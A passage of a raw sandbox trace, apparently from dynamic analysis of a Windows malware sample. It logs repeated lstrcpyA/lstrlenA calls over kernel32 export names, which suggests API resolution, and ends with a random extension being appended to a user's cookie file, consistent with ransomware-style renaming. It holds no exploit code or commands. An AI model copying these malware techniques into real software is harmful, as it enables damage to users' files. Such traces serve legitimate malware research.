(lpString="CREATECONSOLESCREENBUFFER") returned 25 [0181.630] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0181.630] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0181.630] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0181.630] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0181.630] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0181.630] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0181.630] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0181.630] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0181.630] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0181.630] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0181.630] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0181.630] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0181.630] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0181.630] lstrlenA (lpString="CREATEEVENTA") returned 12 [0181.630] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0181.630] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0181.630] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0181.630] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0181.630] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0181.630] lstrlenA (lpString="CREATEEVENTW") returned 12 [0181.630] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0181.630] lstrlenA (lpString="CREATEFIBER") returned 11 [0181.630] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0181.630] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0181.630] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0181.630] lstrlenA (lpString="CREATEFILEA") returned 11 [0181.630] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0181.631] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0181.631] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0181.631] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0181.631] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0181.631] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0181.631] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0181.631] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0181.631] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0181.631] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0181.631] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0181.631] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0181.631] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0181.631] lstrlenA (lpString="CREATEFILEW") returned 11 [0181.631] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0181.631] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0181.631] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0181.631] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0181.631] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0181.631] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0181.631] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0181.631] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0181.631] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0181.631] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0181.631] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0181.631] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0181.631] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0181.631] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0181.631] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0181.631] lstrlenA (lpString="CREATEJOBSET") returned 12 [0181.631] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0181.631] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0181.631] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0181.631] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0181.631] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0181.631] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0181.631] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0181.631] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0181.631] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0181.632] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0181.632] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0181.632] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0181.632] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0181.632] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0181.632] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0181.632] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0181.632] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0181.632] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0181.632] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0181.632] lstrlenA (lpString="CREATEPIPE") returned 10 [0181.632] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0181.632] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0181.632] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0181.632] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0181.632] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0181.632] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0181.632] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0181.632] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0181.632] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0181.632] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0181.632] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0181.632] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0181.632] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0181.632] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0181.632] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0181.632] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0181.632] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0181.632] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0181.632] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0181.632] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0181.632] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0181.632] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0181.632] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0181.632] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0181.632] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0181.633] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0181.633] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0181.633] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0181.633] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0181.633] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0181.633] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0181.633] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0181.633] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0181.633] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0181.633] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0181.633] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0181.633] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0181.633] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0181.633] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0181.633] lstrlenA (lpString="CREATETHREAD") returned 12 [0181.633] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0181.633] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0181.633] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0181.633] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0181.633] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0181.633] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0181.633] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0181.633] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0181.633] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0181.633] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0181.633] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0181.633] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0181.633] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0181.633] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0181.633] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0181.633] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0181.633] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0181.633] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0181.633] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0181.633] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0181.634] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0181.634] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0181.634] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0181.634] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0181.634] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0181.634] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0181.634] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0181.634] lstrlenA (lpString="CTRLROUTINE") returned 11 [0181.634] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0181.634] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0181.634] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0181.634] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0181.634] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0181.634] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0181.634] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0181.634] lstrlenA (lpString="DEBUGBREAK") returned 10 [0181.634] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0181.634] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0181.634] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0181.634] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0181.634] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0181.634] lstrlenA (lpString="DECODEPOINTER") returned 13 [0181.634] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0181.634] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0181.634] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0181.634] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0181.634] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0181.634] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0181.634] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0181.634] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0181.634] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0181.634] lstrlenA (lpString="DELETEATOM") returned 10 [0181.634] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0181.634] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0181.634] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0181.634] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0181.634] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0181.635] lstrlenA (lpString="DELETEFIBER") returned 11 [0181.635] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0181.635] lstrlenA (lpString="DELETEFILEA") returned 11 [0181.635] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0181.635] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0181.635] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0181.635] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0181.635] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0181.635] lstrlenA (lpString="DELETEFILEW") returned 11 [0181.635] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0181.635] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0181.635] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0181.635] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0181.635] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0181.635] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0181.635] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0181.635] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0181.635] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0181.635] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0181.635] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0181.635] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0181.635] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0181.635] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0181.635] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0181.635] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0181.635] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0181.635] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0181.635] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0181.635] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0181.635] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0181.635] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0181.635] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0181.635] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0181.635] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0181.635] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0181.635] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0181.635] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0181.635] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0181.636] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0181.636] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0181.636] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0181.636] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0181.636] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0181.636] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0181.636] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0181.636] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0181.636] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0181.636] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0181.636] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0181.636] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0181.636] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0181.636] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0181.636] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0181.636] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0181.636] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0181.636] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0181.636] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0181.636] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0181.636] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0181.636] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0181.636] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0181.636] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0181.636] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0181.636] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0181.636] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0181.636] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0181.636] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0181.636] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0181.636] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0181.636] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0181.636] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0181.636] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0181.636] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0181.636] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0181.636] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0181.637] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0181.637] lstrcpyW (in: lpString1=0x8b0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0181.637] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@api.bing[2].txt.qIkVSN") returned 119 [0181.637] wsprintfW (in: param_1=0x36fd86c, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS 